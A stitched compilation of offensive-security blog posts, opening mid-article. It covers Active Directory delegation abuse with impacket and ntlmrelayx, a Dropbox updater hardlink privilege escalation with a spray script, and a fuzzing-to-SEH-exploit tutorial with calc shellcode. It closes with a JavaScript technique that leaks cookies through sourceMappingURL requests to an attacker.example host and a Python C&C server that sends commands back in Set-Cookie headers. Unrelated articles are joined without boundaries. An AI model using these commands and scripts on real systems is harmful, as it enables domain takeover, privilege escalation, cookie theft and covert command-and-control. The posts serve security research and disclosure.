I’ll focus on a secondary scenario for this attack – one where you have compromised a standard low-privilege user account (no admin rights) or a computer account, and are on a network segment with other systems you want to compromise.

Process Walkthrough:

To begin with, what this attack really needs is *some* sort of account that is configured with an SPN.  This can be a computer account, a user account that is already configured with an SPN, or a computer account we create ourselves using a non-privileged user account by taking advantage of the default MachineAccountQuota configuration.  We need an account configured with an SPN because this is a requirement for the TGS produced by S4U2Self to be forwardable.  Computer accounts work because, by default, they are configured with a variety of SPNs for all their various Kerberos-enabled services.
So, in our example let’s say we only have a low privilege account (we’ll use the ‘tim’ account). 

The first step in the process is to try to create a computer account, so that we gain control of an account configured with SPNs.  To do this, we’ll use a relatively new impacket example script.  It has a SAMR option to add a new computer, which functions over SMB and uses the same mechanism as when a new computer is added to a domain using the Windows GUI.

-method SAMR -computer-pass MADE_UP_PASSWORD -computer-name MADE_UP_NAME DOMAIN/USER:PASSWORD

After running this command, your new computer object will be added to AD (Note: this example script was not fully working for me in Python 2.7 – the computer object was added but its password was not being set correctly.  It does work under Python 3.6, though.)

This script was released fairly recently; before it, I used PowerMad.ps1 from a Windows VM to perform the same actions.  That tool uses a standard LDAP connection vs. SAMR, but the end result is the same.  For further info on PowerMad I recommend the following:
If this part of the attack didn’t work, the default MachineAccountQuota has likely been changed for users in the environment.  In that case you’ll need an alternative method to obtain a computer account or a user account configured with an SPN.  Once you have that, you can proceed as described below.
For the next part of the attack we’ll be using mitm6 + ntlmrelayx.  Unlike a traditional NTLM relay attack, what we’re really interested in is intercepting machine account hashes, as we can forward them to LDAP on a domain controller.  This allows us to impersonate the relayed computer account and set its msDS-AllowedToActOnBehalfOfOtherIdentity attribute to include the computer object that we control.  Note: we unfortunately can’t relay SMB to LDAP due to the NTLMSSP_NEGOTIATE_SIGN flag set on SMB traffic, so we will be focusing on intercepting HTTP traffic, such as Windows Update requests.
We’ll first set up ntlmrelayx to delegate access to the computer account we just made and control (rbcdTest):

-wh WPAD_Host --delegate-access --escalate-user YOUR_COMPUTER_ACCOUNT\$ -t ldap://DOMAIN_CONTROLLER

We next start a relay attack using mitm6 or another relay tool, and wait for requests to start coming in.  Eventually you should see something that looks like the following:

In the above screenshot we can see that we successfully relayed the incoming auth request made by the server02$ account to LDAP on the domain controller and modified the object’s privileges to give rbcdTest$ impersonation rights on the system.
Once we have delegation rights, the rest of the attack is fairly straightforward.  We’ll use another impacket tool to create the TGS necessary to connect to Server02 using an impersonated identity.
This tool will get us a Kerberos service ticket (TGS) that is valid for a selected service on the remote system we relayed to LDAP (Server02).  As the rbcdTest$ account has delegation rights on this system, we are able to impersonate any user we want, in this case choosing to impersonate ‘administrator’, a domain admin on the testlab.local network.

-spn cifs/Server_You_Relayed_To_Get_RBCD_Rights_On -impersonate TARGET_ACCOUNT DOMAIN/YOUR_CREATED_COMPUTER_ACCOUNT\$:PASSWORD

With the valid ticket saved to disk, all we need to do is export it to memory, which will then allow us to remotely connect to the remote system with administrative privileges:

From dropbox(updater) to NT AUTHORITY\SYSTEM

Original text by @decoder_it

Hardlinks again! Yes, there are plenty of opportunities to raise your privileges via incorrect permission settings combined with hardlinks in a lot of software (MS included).

In this post I’m going to show how to use the DropBoxUpdater  service in order to get SYSTEM privileges starting from a simple Windows user. I found and exploited this “vulnerability”  along with my usual “business partner” @padovah4ck.

Please note:  I’m not going to release any source code,  my goal is to share knowledge, not tools.

The DropBoxUpdater is part of the Dropbox Client Software suite, and according to the Software manufacturer, it is used for keeping the client up-to-date:


The updater is installed as a service plus 2 scheduled tasks and, to be honest, I really don’t know why… but let’s go on. Keep in mind that in standard installations they run as SYSTEM and one of the dropboxupdate tasks is run every hour by the task scheduler.


Each time dropboxupdate is  triggered, it writes log files in this directory:

  • c:\ProgramData\Dropbox\Update\Log

Permissions are the following:


As you can see, users can add files in this directory.

Logfiles have a special format:


And the file naming convention is:

Users can overwrite and delete these files:


Even more interesting is a SetSecurity call made by SYSTEM on these files:


Seems familiar, doesn’t it? If you read my previous post, you already know that this is exploitable via “hardlinks”.

But we have a problem here: we have to “guess” the logfile name, that is, the exact time (including milliseconds) and the PID of the updater process.

Seems challenging!

After some testing we found this solution:

  • Be sure that no process “DropBoxUpdate.exe” is running (as a standard user:
    c:\>tasklist | find /I “dropboxupdate”)
  • Intercept the DropBoxUpdate.exe process upon startup by setting an opportunistic
    exclusive lock on the following DLL:
    • C:\Program Files(x86)\Dropbox\Update\\goopdate.dll
  • The process will hang and the user-defined callback function will be triggered
  • Find the PID of the dropboxupdate process
  • Perform a “hardlink spraying” by creating 999 links with the naming convention
    mentioned before, starting from the current time (hhmmss) + 10 seconds (timeA).
  • All these links point to the destination file we want to own. It is possible to set a
    maximum of 1024 hardlinks to a file.
  • Wait until the current time (hhmmss) is equal to timeA
  • Release the oplock
  • If everything works fine, we should match the correct file name within a range of 999 milliseconds.
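The spraying step can be sketched in Python. Note that the log-file name pattern used below is a made-up placeholder — the real convention is the one shown in the screenshot earlier (time with milliseconds plus the updater PID):

```python
import datetime

def spray_names(start, pid, count=999):
    """Generate candidate log-file names covering `count` consecutive
    milliseconds, starting 10 seconds after `start` (timeA in the steps
    above). NOTE: the name pattern below is a placeholder -- substitute
    the real convention from the screenshot (time w/ ms + updater PID)."""
    t0 = start.replace(microsecond=0) + datetime.timedelta(seconds=10)
    for ms in range(count):
        t = t0 + datetime.timedelta(milliseconds=ms)
        yield "dropbox_update_{:%H%M%S}{:03d}-{}.log".format(
            t, t.microsecond // 1000, pid)

names = list(spray_names(datetime.datetime(2020, 1, 1, 12, 0, 0), 4242))
print(len(names), names[0])   # 999 dropbox_update_120010000-4242.log
```

Each generated name would become one hardlink pointing at the file we want SYSTEM to SetSecurity on.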

Will it work? We just have to try it out, with the classic license.rtf located in the System32 folder. For testing purposes, you can directly invoke the scheduled task with admin rights instead of waiting for the next hourly run.


Wow! It worked. Now you could overwrite any file where SYSTEM has full control.. and gain the highest privileges!

But let’s go a step further… would it be possible to rely only on Dropbox Client software to gain a SYSTEM shell?

Yes, of course! Remember the second scheduled task?


The task runs with SYSTEM privileges and is also triggered at the logon of any user. During our tests we noticed that during logon, DropboxCrashHandler.exe was also invoked (only if no other dropboxupdate process is running in other sessions):


So what was our idea? Set DropboxCrashHandler.exe as the target file, launch the exploit, overwrite the file with our “malicious” executable, log off, log on again, and our executable should be triggered!

Here you can watch the working POC. I presume that there are other possible escalation paths, it’s left up to you 


  • Dropbox has to be installed in “standard” way, with admin rights
  • We tested it with the latest Windows Dropbox Client release (87.4.138 at the time of writing)


We informed Dropbox about this issue on September 18th. They answered that they were aware of the issue (but not of these techniques and the complete escalation paths) and would fix it before the end of October. Since more than 90 days have passed since the initial submission, I published the post.


While waiting for the new (hopefully patched) release, in the meantime you can remove the “Create files / write data” and “Create folders / append data” permissions for “Users” on the Log folder, and you should be fine.


Generic hardlink “abuse” will no longer work in future releases of Windows. In the latest “Insider” previews, MS has added some supplementary checks: if you don’t have write access to the destination file, you get an access-denied error when you try to create a hardlink.

From 0 to 0day — quick fuzzing lesson

Original text by code16

Most of the time, the questions you ask me via the blog or Twitter are: «how to prepare a fuzzing lab» or «how to perform an analysis of the crash we found». I decided to spend the last few days preparing a small example to answer both questions. Below you will find the details. Here we go…
We will start here:

As you can see I started the fuzzer against the application called Free Photo Viewer. As far as I remember I found it here. But first things first…


Depends on what you would like to do (/»fuzz») 😉

For webapps or web servers — sometimes I’m using Burp Suite [12]. But for cases similar to the one we have here (FreePhotoViewer) I recommend you install:
— a clean Windows 7 (I used 32bit)
— Immunity Debugger
— from the Corelan Repository
— HxD (but you can use any hex editor you like)
— the target app (in our case — FreePhotoViewer)
— FOE2 — «Failure Observation Engine».

Installation of FOE2 should be easy but remember to read the funky manual anyway! 😉

For example: you will find the place to edit in the source code to get some more detailed results:

As you can see (red frame — cdb_command): here you can put your favourite (Windbg) commands.
I also like to add: u eip-1; u eip; kb and other similar commands. 😉

I assume that your VM LAB is prepared and FreePhotoViewer is installed. So it’s time to prepare a config for the FOE2 fuzzer.


Installed (target) app is located in «C:\Program Files\Free Photo Viewer»:

We will need it soon.  FOE2’s default installation directory is c:\FOE2\. There you will find the config, seeds and results:

Let’s copy default config file (foe.yaml) to 01-freephotoviewer.yaml. Next open it and edit like it is presented on the screens below:

As you can see, we are changing the name of our ‘fuzzing campaign’. Next (red frame) we place the full path to the target we want to fuzz. 3rd red frame — I just deleted NUL because we will not use any other argument.

Next thing to check in the config — the location of our files. By default, FOE will store all files (seeds, results) in the C:\FOE2\ directory. Edit the location (path) of your ‘sample’ (seed) file(s):

The next thing worth checking in the config is called ‘Fuzzer options’. We will not discuss it today (to keep it simple ;)) but you should definitely play with the options available:

So config file is ready. Now it’s time to prepare a sample file. 🙂

In c:\foe2\seedfiles\example\ you will find a lot of files to try with FOE2. I like to grab 2 or 3 (or 8 ;)) and change them a little bit in HxD. In most cases — for example with a BMP file — I will:
— leave one original BMP file
— take a copy of it and append (for example, a lot of) AAAAAA…AAAA at the end of the file
— copy the original file but keep only the header (the first few lines in HxD) and then append «a lot of A’s» 😉

In this case, from 1 sample seed file I will have 3 files:

Example file (roughly;)) changed:

Save the seed file(s) (and your config) and run FOE2 from cmd.exe, like this:


Usually it should take no longer than a few hours to find the ‘first crash’. But, for example, for Outlook[12] or Access[3] it took 2 months on my small laptop to finally crash the application. 😉

Anyway… after let’s say «3 days»… «you found it! There is a crash!» ;] Cool but what to do next?

Of course, «it depends on the crash». 😉 But for most Windows cases (read: as far as I have seen so far) it will be: a malformed heap, a SEH overflow, or a Unicode (SEH) overflow. Let’s try to identify «the one» from our target app:

As you can see there are ‘few’ bugs to check… I believe you will have some fun. 😉

Now let’s open our target app in ImmunityDbg. As an argument we will use the path to the poc-file generated by FOE2. We should be somewhere here:

As we can see SEH is malformed, so probably we will have to exploit SEH overflow bug. Cool. 🙂

I used HxD to open the poc file to (hopefully) check whether our value from the SEH chain is in there:

Great! Next step: change nSEH, right?

So far, so good. 😉 Next I used !mona seh to get POP, POP, RET:

Next I restarted the target app and after initial run (F7) I added a breakpoint on the location found with «!mona seh» (ppr), for example:

(After the jump to ppr value asm will change, so don’t worry ;))

This was when the ‘tricky part’ started. I was sure it was an ‘easy overflow’ and that I just needed to change the ‘poc file’ by adding more AAAA letters… Well, nope. ;] If I added new letters — the file structure changed. 😐

So the only way was to create a ‘valid shellcode’ with 39 characters. 🙂

First of all I tried to use some MsgBox shellcodes I found online, but almost all of them were ‘bigger than 39 characters’, so I failed again.

The next day 😉 I realized that, during a private talk some time ago, mzer0 and @M4tisec had already told me what I could do to exploit bug(s) like this one.

TL;DR: We will create a small shellcode ;] to:
— put calc.exe in memory
— run it using WinExec

Simple enough? «We gotta try«:

I played a little bit more with the target app to see what I should do to manipulate the flow:

As you can see below, the file is not that long, so there is only a small space to put our shellcode:

I changed 43434343 to poppopret. Next we can see that we can jump to our NOP’s and CCCC-shellcode:

So after a while (and a lot of reading and searching online) I created this nasty shellcode ;P

In the 2nd and 3rd PUSH you will find «.exe» and «calc» (see ESP below); next is the WinExec function.
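A quick sanity check of why those two PUSHes spell out the WinExec argument — x86 is little-endian, so the dword pushed last ends up at the lowest address:

```python
import struct

# From the shellcode above: PUSH 0x6578652e puts ".exe" on the stack,
# then PUSH 0x636c6163 puts "calc" just below it (lower address),
# so ESP points at the contiguous string "calc.exe" for WinExec.
push_exe = struct.pack("<I", 0x6578652e)    # b".exe"
push_calc = struct.pack("<I", 0x636c6163)   # b"calc"
print(push_calc + push_exe)                 # b'calc.exe'
```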

Final results you will find on the screen below:

That’s all 😉

I hope now it will be easier to find some new bugs. In case of any questions — feel free to mail me or ping me @twitter. 😉

If you like the post and you would like to donate (or just buy me a coffee;)) — on the top (right) you will find a Paypal button.

See you next time! 😉


Javascript Anti Debugging — Some Next Level Sh*t (Part 1 — Abusing SourceMappingURL)

Original text by Gal Weizman

tl;dr — Abusing the SourceMappingURL feature can allow attackers to create one of the strongest cross-browser Javascript Anti Debugging techniques ever seen (fully detailed live demo)

This was originally published on PerimeterX blog

This article’s purpose is to introduce a new Javascript Anti Debugging technique in an advanced level and therefore assumes the reader already has an understanding of the different aspects of web security and what Javascript Anti Debugging really is.

Not too long ago, I learned about the SourceMappingURL feature, which basically allows you to fetch a Source Map for your Javascript resources. It maps minified/uglified Javascript code back to its original source code, thus allowing developers to easily debug their source code in the browser instead of struggling with the minified/uglified version — pretty cool feature! (and a pretty old one as well)

All you need to do is to locate the following comment at the bottom of your minified/uglified Javascript resource:

//# sourceMappingURL=

and the browser will fetch the map from your servers (which you’ll also need to implement yourself in order for the feature to actually work), and will take care of the mapping and its presentation for you (if this doesn’t make a lot of sense to you — go read more about SourceMappingURL!).

Two very important notes before we start:

The SourceMappingURL feature is only activated when the browser’s devtools are open, since this is a development-only feature and should not be a burden on the website while loading if the website is not being inspected!

Everything I am going to talk about here is relevant to every major browser out there (tested on Chrome, Safari, Firefox, Edge, Opera); however, some things might work in weaker forms. Please take into consideration that this feature did not exhibit 100% consistent behavior across browsers and versions, as achieving that was not a goal of this project — a proof of concept was.

I was curious about its implementation and was wondering regarding its potential security issues, so I decided to have a look at it myself.

It immediately drew my attention when I realized its first interesting property:

If a script contains the SourceMappingURL comment and is attached to the DOM, the browser will fire a request to the link specified after the = sign — but you won’t be able to tell that by looking at the devtools — you won’t see anything in the network panel nor in the console panel — simply nowhere! The only way of telling that the request happened is by either using some sort of network-debugging proxy (such as Fiddler or Wireshark) or looking for that request in the browser’s internal network log (in Chrome, for example). The response to this request, however, cannot be captured by client-side Javascript since it is handled by the browser itself (because the browser is the one to fetch the source map and use it to map the bundled resources back to the original resources).

Now that caught my attention! Being able to fire a hidden request from the browser — now that’s powerful. This is where I wondered about other properties this request might have that could be abused by attackers.

So firing a hidden request is awesome and everything, but it is just a static request. I mean, if I could dynamically construct the url to which the SourceMappingURL request should go, that would be even more powerful.

The following works:

function smap(url, data) {
  const script = document.createElement('script');
  script.textContent = `//# sourceMappingURL=${url}?data=${JSON.stringify(data)}`;
  document.head.appendChild(script);
  // that's right! the script doesn't even have to stay in the DOM for this feature to work! how cool is that?!
  script.remove();
}

smap('', {cookie: document.cookie});

And since this works, I can leak any type of dynamic information I want from the browser during its current execution. I can steal cookies, report timestamps and generally collect any type of information I wish to report and simply add it to the SourceMappingURL in order to send it. This is some powerful stuff!
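The comment the snippet above assembles can also be built server-side ahead of time; here is a hedged Python equivalent (the URL is a placeholder) showing how the leaked data lands in the query string:

```python
import json
import urllib.parse

def smap_comment(url: str, data: dict) -> str:
    """Build a sourceMappingURL comment whose 'map' URL carries the
    stolen data URL-encoded in its query string."""
    qs = urllib.parse.urlencode({"data": json.dumps(data)})
    return "//# sourceMappingURL={}?{}".format(url, qs)

print(smap_comment("https://attacker.example/map", {"cookie": "sid=abc"}))
```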

So far so good. But as I always do when I learn of a new trick to send requests from the browser — I tried to see if I can use this one to bypass CSP rules.

Wow! That one was a cool discovery in my research! So if I visit a website that responds with a restrictive Content-Security-Policy: default-src header (meaning requests from its pages are only allowed to go back to the allowed origin), I would be able to bypass that rule completely by using the SourceMappingURL feature by doing:

// SourceMappingURL=

This is pretty cool considering how difficult and almost impossible it is to bypass CSP rules these days.

Another cool property of the SourceMappingURL feature is the fact that it can send non-secure requests over http:// even if the main page was loaded via a secure connection over https:// — a scenario that cannot be accomplished otherwise in the browser, since SSL downgrade is forbidden and is considered to be a serious security flaw.

So by this point I found some really cool hacks that by combining them all together, one can leak sensitive information while bypassing website’s CSP rules without it being documented whatsoever in the devtools, thus making it super hard to tell this strange activity took place in the victim’s browser.

So far so good. And then I was wondering to myself, if SourceMappingURL fires a request, does it have any of the other standard properties that any common request has? We already know that the response cannot be processed by the client side Javascript — so how is it similar to other types of network APIs in the browser? And then I’ve found the property that changed the game completely:

And that is the most powerful property of this feature — even though we don’t get to process the response ourselves, the browser respects response headers for this request, including Set-Cookie! This means an attacker can have a full request-and-response mechanism, simply by having their server inject the response into a cookie header instead of the actual response body!

function smap ( … ) { … } // same as in the snippet above…

const i = setInterval(() => {
  const response = getCookieValueByCookieName('SMAP_RESPONSES');
  if (!response) return;
  deleteCookieByCookieName('SMAP_RESPONSES');
  clearInterval(i);
  alert('server says that 1 + 2 is ' + response);
}, 100);

smap('', {a: 1, b: 2});

Wait — this sounds much more powerful than just a Javascript Anti Debugging technique — why stop there?

So, as I said before, the SourceMappingURL request is only fired when the devtools are open.

And that takes away a lot of this finding’s power, since it means that everything I have found so far is only relevant when the devtools are open.


Since SourceMappingURL feature

  • fires a request the second devtools are being opened
  • is completely silent about sending the request
  • bypasses CSP rules completely
  • respects headers and cookies

It can actually be used as a very strong Javascript Anti Debugging technique!

How? (in a couple of words…)

By using SourceMappingURL feature’s power, an attacker can make sure their code will inform their servers the second the browser has its devtools opened.

In the response, the attacker can mark that browser with a cookie that will identify it as a potential hazard for the attacker. With that mark, the attacker can choose to do whatever they want — probably serve that browser an innocent Javascript code instead of their malicious code until the marking cookie expires.

Or instead, the attacker can respond with a cookie that will contain data that the malicious Javascript code relies on in order to determine its next steps (a variation of a C&C Client-Server mechanism if you will).

The server, for example, can respond with

Set-Cookie: SMAP_COMMAND=while(1){}

and the client side can execute any command given to it by the server.
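A minimal sketch of the attacker-side endpoint for this C&C variation (the handler name, port handling and the demo request are all mine; a real server would also return a valid source map body):

```python
import http.server
import threading
import urllib.parse
import urllib.request

class SmapHandler(http.server.BaseHTTPRequestHandler):
    """Answer the silent source-map request: log whatever was leaked in
    the query string and hand back the next 'command' in a Set-Cookie
    header, exactly as described above."""
    command = "while(1){}"

    def do_GET(self):
        leaked = urllib.parse.urlparse(self.path).query
        print("leaked:", urllib.parse.unquote_plus(leaked))
        self.send_response(200)
        self.send_header("Set-Cookie", "SMAP_COMMAND=" + self.command)
        self.end_headers()
        self.wfile.write(b"{}")  # an empty JSON body stands in for the map

    def log_message(self, *args):
        pass  # keep the console quiet

# Demo: serve exactly one request and show the Set-Cookie the victim gets.
srv = http.server.HTTPServer(("127.0.0.1", 0), SmapHandler)
threading.Thread(target=srv.handle_request).start()
url = "{}/map?data=sid%3Dabc".format(srv.server_address[1])
resp = urllib.request.urlopen(url)
print(resp.headers["Set-Cookie"])   # SMAP_COMMAND=while(1){}
srv.server_close()
```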

Also, on top of that request, the attacker can also leak any type of information they wish to steal from the victim.

And on top of everything, it will be extremely hard for any researcher to find this malicious activity since the request leaves no trace of its occurrence (and even harder if the attacker actually decides to avoid malicious code execution on that specific browser once it was marked as a “devtools opener”).

“I don’t quite understand… I need some live examples”

That’s fair! This concept is not super easy to grasp just by reading, it is definitely worth seeing it works on live. Lucky for you, I’ve created a thorough technical demo that attempts to fully explain and demonstrate everything mentioned here.

You are encouraged to check it out and let me know what you think of it!

“Wait, you said this was Part 1, Is there a Part 2?”

Oh, right! In the next article I will cover another interesting ability I’ve found that only exists in browsers that use Chromium’s devtools.

It is another cool trick that can assist hackers in better understanding the researchers actions when trying to uncover them, and also protect only very specific parts of their malicious code, thus making it even harder for researchers to catch them.

I will post the link here once it is done 🙂

To sum up

As someone who has experienced the world of web security and hacking quite a lot in my military service, I can tell you that this trick right here will take the game to the next level if used correctly.

Revealing malicious activity in the browser is much harder for researchers when there are actions made by the attacker that take place in the browser without the researcher being able to tell that they even happened!

Correctly implementing this trick in an attacking exploit kit will significantly reduce the chances of being uncovered by researchers (maybe not so much now that this article is publicly published) by basically filtering those researchers out of the way and only attacking the innocent.

This trick can of course be very helpful not only to attackers but to other entities as well (such as big companies who want to alter their code when it is being investigated by researchers for example).

This technique has been responsibly disclosed to the chromium project more than 90 days before publishing this article.

Hope you guys enjoyed this! 🙂

This research was conducted and published by Gal Weizman on behalf of PerimeterX Inc.